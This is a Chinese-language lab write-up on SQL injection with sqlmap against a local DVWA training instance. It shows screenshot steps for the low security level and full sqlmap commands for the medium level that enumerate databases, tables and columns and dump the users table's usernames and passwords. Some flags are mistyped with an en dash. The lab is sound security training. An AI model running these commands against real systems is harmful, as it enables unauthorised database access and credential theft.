DVWA--sql注入(工具注入)

实验环境:

配置DVWA平台。

进入DVWA平台,选择DVWA Security,将安全级别设置为Low

点击SQL Injection,进入测试页面。

(1)判断注入点。

DVWA--sql注入(工具注入)_第1张图片

(2)列出所有的数据库

DVWA--sql注入(工具注入)_第2张图片

(3)列出当前数据库

DVWA--sql注入(工具注入)_第3张图片

(4)列出DBname数据库所有的表

DVWA--sql注入(工具注入)_第4张图片

(5)列出DBname数据库table表中的所有列

DVWA--sql注入(工具注入)_第5张图片

(6)导出DBname数据库table表中指定列的数据。

DVWA--sql注入(工具注入)_第6张图片

任务2:尝试用sqlmapSQL Injection的中级进行注入,写出实验步骤。

(注意:中级为post方法,--data数据以POST方式提交,-p 指定参数)

DVWA--sql注入(工具注入)_第7张图片

注入点

sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/#"  --cookie="security=medium;PHPSESSID=lb2pakbedinc0cj246lij26m80" --data="Submit=Submit&id=1" --batch -p "id" 

DVWA--sql注入(工具注入)_第8张图片

数据库

sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/#"  --cookie="security=medium;PHPSESSID=lb2pakbedinc0cj246lij26m80" --data="Submit=Submit&id=1" --batch -p "id"  --dbs

DVWA--sql注入(工具注入)_第9张图片

sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/#"  --cookie="security=medium;PHPSESSID=lb2pakbedinc0cj246lij26m80" --data="Submit=Submit&id=1" --batch -p "id"  --current-db

DVWA--sql注入(工具注入)_第10张图片

sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/#"  --cookie="security=medium;PHPSESSID=lb2pakbedinc0cj246lij26m80" --data="Submit=Submit&id=1" --batch -p "id"  -D dvwa –tables

DVWA--sql注入(工具注入)_第11张图片

sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/#"  --cookie="security=medium;PHPSESSID=lb2pakbedinc0cj246lij26m80" --data="Submit=Submit&id=1" --batch -p "id"  -T users –columns

DVWA--sql注入(工具注入)_第12张图片

表中数据

sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/#"  --cookie="security=medium;PHPSESSID=lb2pakbedinc0cj246lij26m80" --data="Submit=Submit&id=1" --batch -p "id"  -T users -C "user,password" –dump

DVWA--sql注入(工具注入)_第13张图片

你可能感兴趣的:(DVWA,sql,数据库)